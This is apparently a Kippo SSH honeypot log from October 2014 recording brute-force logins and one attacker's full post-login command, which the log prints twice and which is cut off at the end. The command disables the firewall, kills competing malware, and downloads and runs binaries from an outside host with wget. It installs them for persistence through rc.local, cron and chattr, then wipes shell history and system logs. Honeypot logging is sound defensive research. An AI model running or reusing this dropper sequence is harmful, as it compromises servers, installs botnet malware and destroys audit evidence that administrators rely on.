2014-10-16 21:32:39+0100 [-] Log opened. 2014-10-16 21:32:39+0100 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up. 2014-10-16 21:32:39+0100 [-] reactor class: twisted.internet.pollreactor.PollReactor. 2014-10-16 21:32:39+0100 [-] HoneyPotSSHFactory starting on 2222 2014-10-16 21:32:39+0100 [-] Starting factory 2014-10-17 00:44:31+0100 [-] Received SIGTERM, shutting down. 2014-10-17 00:44:31+0100 [-] (TCP Port 2222 Closed) 2014-10-17 00:44:31+0100 [-] Stopping factory 2014-10-17 00:44:31+0100 [-] Main loop terminated. 2014-10-17 00:44:31+0100 [-] Server Shut Down. 2014-10-17 00:45:58+0100 [-] Log opened. 2014-10-17 00:45:58+0100 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up. 2014-10-17 00:45:58+0100 [-] reactor class: twisted.internet.pollreactor.PollReactor. 2014-10-17 00:45:58+0100 [-] Traceback (most recent call last): 2014-10-17 00:45:58+0100 [-] File "/usr/bin/twistd", line 14, in 2014-10-17 00:45:58+0100 [-] run() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py", line 27, in run 2014-10-17 00:45:58+0100 [-] app.run(runApp, ServerOptions) 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 652, in run 2014-10-17 00:45:58+0100 [-] runApp(config) 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py", line 23, in runApp 2014-10-17 00:45:58+0100 [-] _SomeApplicationRunner(config).run() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 390, in run 2014-10-17 00:45:58+0100 [-] self.postApplication() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/scripts/_twistd_unix.py", line 208, in postApplication 2014-10-17 00:45:58+0100 [-] self.startApplication(self.application) 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/scripts/_twistd_unix.py", line 317, in startApplication 2014-10-17 00:45:58+0100 [-] service.IService(application).privilegedStartService() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 277, in privilegedStartService 2014-10-17 00:45:58+0100 [-] service.privilegedStartService() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/application/internet.py", line 105, in privilegedStartService 2014-10-17 00:45:58+0100 [-] self._port = self._getPort() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/application/internet.py", line 133, in _getPort 2014-10-17 00:45:58+0100 [-] 'listen%s' % (self.method,))(*self.args, **self.kwargs) 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 436, in listenTCP 2014-10-17 00:45:58+0100 [-] p.startListening() 2014-10-17 00:45:58+0100 [-] File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 622, in startListening 2014-10-17 00:45:58+0100 [-] raise CannotListenError, (self.interface, self.port, le) 2014-10-17 00:45:58+0100 [-] twisted.internet.error.CannotListenError: Couldn't listen on 0.0.0.0:22: [Errno 13] Permission denied. 2014-10-17 00:46:32+0100 [-] Log opened. 2014-10-17 00:46:32+0100 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up. 2014-10-17 00:46:32+0100 [-] reactor class: twisted.internet.pollreactor.PollReactor. 2014-10-17 00:46:32+0100 [-] HoneyPotSSHFactory starting on 2222 2014-10-17 00:46:32+0100 [-] Starting factory 2014-10-17 00:50:02+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 50.116.26.68:40139 (192.168.3.119:2222) [session: 0] 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] Remote SSH version: SSH-2.0-libssh2_1.2.2 PHP 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] outgoing: aes128-ctr hmac-sha1 none 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] incoming: aes128-ctr hmac-sha1 none 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] NEW KEYS 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] starting service ssh-userauth 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] Got remote error, code 11 reason: PECL/ssh2 (http://pecl.php.net/packages/ssh2) 2014-10-17 00:50:02+0100 [HoneyPotTransport,0,50.116.26.68] connection lost 2014-10-17 03:48:48+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:29588 (192.168.3.119:2222) [session: 1] 2014-10-17 03:48:49+0100 [HoneyPotTransport,1,122.225.109.214] Remote SSH version: SSH-2.0-libssh2_1.4.2 2014-10-17 03:48:49+0100 [HoneyPotTransport,1,122.225.109.214] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 03:48:49+0100 [HoneyPotTransport,1,122.225.109.214] outgoing: aes128-ctr hmac-sha1 none 2014-10-17 03:48:49+0100 [HoneyPotTransport,1,122.225.109.214] incoming: aes128-ctr hmac-sha1 none 2014-10-17 03:48:50+0100 [HoneyPotTransport,1,122.225.109.214] NEW KEYS 2014-10-17 03:48:50+0100 [HoneyPotTransport,1,122.225.109.214] starting service ssh-userauth 2014-10-17 03:48:50+0100 [SSHService ssh-userauth on HoneyPotTransport,1,122.225.109.214] root trying auth none 2014-10-17 03:48:51+0100 [SSHService ssh-userauth on HoneyPotTransport,1,122.225.109.214] root trying auth password 2014-10-17 03:48:51+0100 [SSHService ssh-userauth on HoneyPotTransport,1,122.225.109.214] login attempt [root/admin] succeeded 2014-10-17 03:48:51+0100 [SSHService ssh-userauth on HoneyPotTransport,1,122.225.109.214] root authenticated with password 2014-10-17 03:48:51+0100 [SSHService ssh-userauth on HoneyPotTransport,1,122.225.109.214] starting service ssh-connection 2014-10-17 03:48:51+0100 [SSHService ssh-connection on HoneyPotTransport,1,122.225.109.214] got channel session request 2014-10-17 03:48:51+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,122.225.109.214] channel open 2014-10-17 03:48:51+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,122.225.109.214] asking for subsystem "sftp" 2014-10-17 03:48:51+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,122.225.109.214] {'sftp': } 2014-10-17 03:48:52+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,122.225.109.214] sending close 0 2014-10-17 03:48:52+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,122.225.109.214] remote close 2014-10-17 03:48:52+0100 [HoneyPotTransport,1,122.225.109.214] connection lost 2014-10-17 03:49:21+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:35647 (192.168.3.119:2222) [session: 2] 2014-10-17 03:49:21+0100 [HoneyPotTransport,2,122.225.109.214] connection lost 2014-10-17 03:50:04+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:46699 (192.168.3.119:2222) [session: 3] 2014-10-17 03:50:05+0100 [HoneyPotTransport,3,122.225.109.214] Remote SSH version: SSH-2.0-libssh2_1.4.2 2014-10-17 03:50:05+0100 [HoneyPotTransport,3,122.225.109.214] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 03:50:05+0100 [HoneyPotTransport,3,122.225.109.214] outgoing: aes128-ctr hmac-sha1 none 2014-10-17 03:50:05+0100 [HoneyPotTransport,3,122.225.109.214] incoming: aes128-ctr hmac-sha1 none 2014-10-17 03:50:06+0100 [HoneyPotTransport,3,122.225.109.214] NEW KEYS 2014-10-17 03:50:07+0100 [HoneyPotTransport,3,122.225.109.214] starting service ssh-userauth 2014-10-17 03:50:07+0100 [SSHService ssh-userauth on HoneyPotTransport,3,122.225.109.214] root trying auth none 2014-10-17 03:50:09+0100 [SSHService ssh-userauth on HoneyPotTransport,3,122.225.109.214] root trying auth password 2014-10-17 03:50:09+0100 [SSHService ssh-userauth on HoneyPotTransport,3,122.225.109.214] login attempt [root/admin] succeeded 2014-10-17 03:50:09+0100 [SSHService ssh-userauth on HoneyPotTransport,3,122.225.109.214] root authenticated with password 2014-10-17 03:50:09+0100 [SSHService ssh-userauth on HoneyPotTransport,3,122.225.109.214] starting service ssh-connection 2014-10-17 03:50:09+0100 [SSHService ssh-connection on HoneyPotTransport,3,122.225.109.214] got channel session request 2014-10-17 03:50:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,122.225.109.214] channel open 2014-10-17 03:50:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,122.225.109.214] asking for subsystem "sftp" 2014-10-17 03:50:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,122.225.109.214] {'sftp': } 2014-10-17 03:50:10+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,122.225.109.214] sending close 0 2014-10-17 03:50:11+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,122.225.109.214] remote close 2014-10-17 03:50:11+0100 [HoneyPotTransport,3,122.225.109.214] connection lost 2014-10-17 03:50:48+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:6074 (192.168.3.119:2222) [session: 4] 2014-10-17 03:50:48+0100 [HoneyPotTransport,4,122.225.109.214] Remote SSH version: SSH-2.0-libssh2_1.4.2 2014-10-17 03:50:48+0100 [HoneyPotTransport,4,122.225.109.214] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 03:50:48+0100 [HoneyPotTransport,4,122.225.109.214] outgoing: aes128-ctr hmac-sha1 none 2014-10-17 03:50:48+0100 [HoneyPotTransport,4,122.225.109.214] incoming: aes128-ctr hmac-sha1 none 2014-10-17 03:50:50+0100 [HoneyPotTransport,4,122.225.109.214] NEW KEYS 2014-10-17 03:50:50+0100 [HoneyPotTransport,4,122.225.109.214] starting service ssh-userauth 2014-10-17 03:50:50+0100 [SSHService ssh-userauth on HoneyPotTransport,4,122.225.109.214] admin trying auth none 2014-10-17 03:50:51+0100 [SSHService ssh-userauth on HoneyPotTransport,4,122.225.109.214] admin trying auth password 2014-10-17 03:50:51+0100 [SSHService ssh-userauth on HoneyPotTransport,4,122.225.109.214] login attempt [admin/admin] succeeded 2014-10-17 03:50:51+0100 [SSHService ssh-userauth on HoneyPotTransport,4,122.225.109.214] admin authenticated with password 2014-10-17 03:50:51+0100 [SSHService ssh-userauth on HoneyPotTransport,4,122.225.109.214] starting service ssh-connection 2014-10-17 03:50:51+0100 [SSHService ssh-connection on HoneyPotTransport,4,122.225.109.214] got channel session request 2014-10-17 03:50:51+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,122.225.109.214] channel open 2014-10-17 03:50:51+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,122.225.109.214] asking for subsystem "sftp" 2014-10-17 03:50:51+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,122.225.109.214] {'sftp': } 2014-10-17 03:50:52+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,122.225.109.214] sending close 0 2014-10-17 03:50:53+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,122.225.109.214] remote close 2014-10-17 03:50:53+0100 [HoneyPotTransport,4,122.225.109.214] connection lost 2014-10-17 03:55:01+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:10749 (192.168.3.119:2222) [session: 5] 2014-10-17 03:55:01+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:10750 (192.168.3.119:2222) [session: 6] 2014-10-17 03:55:01+0100 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.109.214:10751 (192.168.3.119:2222) [session: 7] 2014-10-17 03:55:01+0100 [HoneyPotTransport,5,122.225.109.214] Remote SSH version: SSH-2.0-PuTTY_Release_0.63cn 2014-10-17 03:55:01+0100 [HoneyPotTransport,5,122.225.109.214] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 03:55:01+0100 [HoneyPotTransport,5,122.225.109.214] outgoing: aes256-ctr hmac-sha1 none 2014-10-17 03:55:01+0100 [HoneyPotTransport,5,122.225.109.214] incoming: aes256-ctr hmac-sha1 none 2014-10-17 03:55:01+0100 [HoneyPotTransport,6,122.225.109.214] Remote SSH version: SSH-2.0-PuTTY_Release_0.63cn 2014-10-17 03:55:01+0100 [HoneyPotTransport,6,122.225.109.214] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 03:55:01+0100 [HoneyPotTransport,6,122.225.109.214] outgoing: aes256-ctr hmac-sha1 none 2014-10-17 03:55:01+0100 [HoneyPotTransport,6,122.225.109.214] incoming: aes256-ctr hmac-sha1 none 2014-10-17 03:55:02+0100 [HoneyPotTransport,7,122.225.109.214] Remote SSH version: SSH-2.0-PuTTY_Release_0.63cn 2014-10-17 03:55:02+0100 [HoneyPotTransport,7,122.225.109.214] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-10-17 03:55:02+0100 [HoneyPotTransport,7,122.225.109.214] outgoing: aes256-ctr hmac-sha1 none 2014-10-17 03:55:02+0100 [HoneyPotTransport,7,122.225.109.214] incoming: aes256-ctr hmac-sha1 none 2014-10-17 03:55:03+0100 [HoneyPotTransport,5,122.225.109.214] NEW KEYS 2014-10-17 03:55:03+0100 [HoneyPotTransport,5,122.225.109.214] starting service ssh-userauth 2014-10-17 03:55:03+0100 [HoneyPotTransport,6,122.225.109.214] NEW KEYS 2014-10-17 03:55:03+0100 [HoneyPotTransport,6,122.225.109.214] starting service ssh-userauth 2014-10-17 03:55:03+0100 [SSHService ssh-userauth on HoneyPotTransport,5,122.225.109.214] root trying auth none 2014-10-17 03:55:03+0100 [SSHService ssh-userauth on HoneyPotTransport,6,122.225.109.214] admin trying auth none 2014-10-17 03:55:03+0100 [SSHService ssh-userauth on HoneyPotTransport,5,122.225.109.214] root trying auth keyboard-interactive 2014-10-17 03:55:04+0100 [SSHService ssh-userauth on HoneyPotTransport,6,122.225.109.214] admin trying auth keyboard-interactive 2014-10-17 03:55:04+0100 [SSHService ssh-userauth on HoneyPotTransport,5,122.225.109.214] login attempt [root/admin] succeeded 2014-10-17 03:55:04+0100 [SSHService ssh-userauth on HoneyPotTransport,5,122.225.109.214] root authenticated with keyboard-interactive 2014-10-17 03:55:04+0100 [SSHService ssh-userauth on HoneyPotTransport,5,122.225.109.214] starting service ssh-connection 2014-10-17 03:55:04+0100 [SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] got channel session request 2014-10-17 03:55:04+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] channel open 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] executing command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] exec command: "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> 